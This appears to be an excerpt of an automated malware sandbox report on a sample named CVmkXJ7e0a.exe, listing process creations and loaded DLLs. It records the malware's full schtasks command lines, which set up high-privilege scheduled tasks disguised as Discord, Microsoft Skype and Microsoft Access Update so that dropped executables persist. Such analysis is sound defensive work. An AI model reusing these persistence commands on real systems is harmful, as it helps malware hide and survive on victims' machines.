Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Microsoft Skype"
Source: unknown	Process created: C:\Users\Public\Pictures\xdwdUpdate.exe C:\Users\Public\Pictures\xdwdUpdate.exe
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Users\Public\Pictures\xdwdUpdate.exe "C:\Users\Public\Pictures\xdwdUpdate.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: netfxperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: esentprf.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: perfts.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: msdtcuiu.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: msscntrs.dll	Jump to behavior
